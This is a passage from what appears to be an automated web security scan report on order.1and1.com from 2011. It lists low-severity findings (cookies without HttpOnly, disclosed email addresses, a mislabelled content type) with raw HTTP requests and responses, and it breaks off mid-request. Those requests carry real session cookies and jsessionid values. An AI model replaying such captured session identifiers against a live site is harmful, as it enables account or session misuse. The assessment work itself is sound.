Path:   /xml/order/popupTcGoogleAdwords

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/popupTcGoogleAdwords;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:46:57 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=4a2AwMzQqU1NTTWBWdDpybDkrNW5hWzNKPTcfIyAgHx0fHRoxNDMtMDQnKSgnJEk3Y1haaCAiHU0mUHY8LzAsKzAsKi0rJS0kIyxkZSsgJ1dgPTAxLSwxLisuKSwtJic=; Expires=Fri, 07-Apr-2079 22:01:04 GMT; Path=/
ETag: 6447aa64162097c42fe1904421a3897b
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17242


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.168. http://order.1and1.com/xml/order/popupTcGoogleAdwords  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/popupTcGoogleAdwords

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/popupTcGoogleAdwords HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:46:25 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=3b642682d7bbd000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/popupTcGoogleAdwords;jsessionid=B2EEE577726F2FA6B3B7334798083D45.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.169. http://order.1and1.com/xml/order/popupWebsiteMagazine  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/popupWebsiteMagazine

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/popupWebsiteMagazine HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:35:51 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=7feacfa62b8fb000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/popupWebsiteMagazine;jsessionid=A452B317247532F2BF2881CCC63C5F06.TCpfix141a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.170. http://order.1and1.com/xml/order/sitedesign  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/sitedesign

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/sitedesign HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:34:51 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=59c0d039ad1bdc00; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/sitedesign;jsessionid=394148206EE1F88BBCF2781787CD33B7.TCpfix140a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.171. http://order.1and1.com/xml/order/tariffselect  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/tariffselect

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/tariffselect;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static&__sendingdata=1&packageselection=Hosting&cart.action=add-bundle&cart.bundle=tariff-beginner-package-bundle HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=Home; ucuo=20110320183705-002.TCpfix141a; lastpage=Hosting; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; UT=0b2Q0NzguV1dXUWRaYSdfWT0vOXJlXzdOQTsjJyQkIyEjIR4eISAaNDgrLSwrKE07Z1xebCQmIVEqVGMpHB0wLzQwLjEvKTEoJzBoaS8kK1tkKh0eGjA1Mi8yLTAxKis=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:7:AAABLtRYEq4lKh04bfPXut2iW59Fdwxl:1300642665134; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 17:37:27 GMT
Server: Apache
Location: http://order.1and1.com:80/xml/order/domaincheck;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642647822&__frame=_top&__lf=Static
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=UaF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigdO2t0Oi0uKikuKygrJikqIyQ=; Expires=Fri, 07-Apr-2079 20:51:34 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 0


5.172. http://order.1and1.com/xml/order/tariffselect  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/tariffselect

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/tariffselect HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:38:17 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=8853c31122ce000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/tariffselect;jsessionid=80078DB13C40A8A96EDAE7880B9E1DB8.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


6. Email addresses disclosed  previous  next
There are 5 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


6.1. http://order.1and1.com/xml/order/FeatureDomainPdr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureDomainPdr

Issue detail

The following email addresses were disclosed in the response:

Request

GET /xml/order/FeatureDomainPdr;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:39:38 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigdO2t0Oi0uKikuKygrJikqIyQ=; Expires=Fri, 07-Apr-2079 21:53:45 GMT; Path=/
ETag: 6aa33937828532fc07c39d975616575c
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17619


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<p>jane@jane-domain.com</p>
...[SNIP]...
<p>jane@jane-domain.com</p>
...[SNIP]...
<p>jane@jane-domain.com</p>
...[SNIP]...
<p>jane-domain.com@registrar.schlund.info</p>
...[SNIP]...

6.2. http://order.1and1.com/xml/order/International  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/International

Issue detail

The following email address was disclosed in the response:

Request

GET /xml/order/International;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:38:07 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=2bWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC0wKy4vKCk=; Expires=Fri, 07-Apr-2079 21:52:14 GMT; Path=/
ETag: ff92e81d1737af4a2a56f9b3afc85af1
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 23585


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<p class="fine">5 dedicated POP3/IMAP e-mail accounts to create a yourname@yourdomain.com</p>
...[SNIP]...

6.3. http://order.1and1.com/xml/order/Mail  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Mail

Issue detail

The following email address was disclosed in the response:

Request

GET /xml/order/Mail;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__reuse=1300643443260
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=Hosting; ucuo=20110320183236-002.TCpfix141a; lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; UT=taV4uMTIoUVFRS3VrcjhwajcpM2xfWTFIOzUdIR4eHRsdMi8vMjErLjIlJyYlIkc1YVZYZh4gG0s7ZXQ6LS4qKS4qKCspIysiISpiYykeJWx1Oy4vKyovLCoqKSclJyo=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:26:AAABLtRlgbZ6_eg4OG2LZboWFQTS2jli:1300643545526; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:52:06 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=Sal8vMjMpUlJSTF9sczlxazgqNG1gWjJJPDYeIh8fHhweHDAwMzIsLzMmKCcmI0g2YldZZx8hHEwlZnU7Li8rKi8rKSwqJCwjIitjZCofJlZ2PC8wLCswLSsrKigmKCs=; Expires=Fri, 07-Apr-2079 21:06:13 GMT; Path=/
ETag: d9cfb4af92e44225f0ad2cca48eb1ca6
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 18209


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<strong>your.name@yourdomain.com</strong>
...[SNIP]...

6.4. http://order.1and1.com/xml/order/MailXchange  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/MailXchange

Issue detail

The following email address was disclosed in the response:

Request

GET /xml/order/MailXchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.ecommerce HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:24:45 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=ra2AwMzQqU1NTTWBWdDpybDkrNW5hWzNKPTcfIyAgHx0fHRoxNDMtMDQnKSgnJEk3Y1haaCAiHU0mUHY8LzAsKzAsKi0rJS0kIyxkZSsgJ1dgPTAxLSwxLisuKSwtJic=; Expires=Fri, 07-Apr-2079 21:38:52 GMT; Path=/
ETag: 80d79fb7f81c76e6606c17b109cfe0c5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 24474


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<a href="mailto:bizsolutions@1and1.com">bizsolutions@1and1.com</a>
...[SNIP]...

6.5. http://order.1and1.com/xml/order/PrivacyPolicy  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/PrivacyPolicy

Issue detail

The following email addresses were disclosed in the response:

Request

GET /xml/order/PrivacyPolicy;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=ft.nav.privacypolicy HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:36:35 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=idGk5PD0zXFxcVmlfZixkXisdJ2BTZDxTRkAoLCkpKCYoJiMjJiUfIiYZGxowLVJAbGFjcSkrJlYvWWguISIeHSIeHDY0LjYtLDVtbjQpMGBpLyIjHx4jIB0gMjU2LzA=; Expires=Fri, 07-Apr-2079 21:50:43 GMT; Path=/
ETag: 3dd7dc19c0118095f7d091fc8a56e2d8
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 24721


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<a href="mailto:PrivacyPolicy@1and1.com">PrivacyPolicy@1and1.com</a>
...[SNIP]...
<a href="mailto:abuse@1and1.com">abuse@1and1.com</a>
...[SNIP]...

7. Content type incorrectly stated  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/webservice/VDSPriceService

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain JSON.

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

POST /xml/webservice/VDSPriceService;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/CloudDynamicServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=MsHosting&linkId=hd.nav.domains
Origin: http://order.1and1.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: text/plain
wstype: jsonws
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
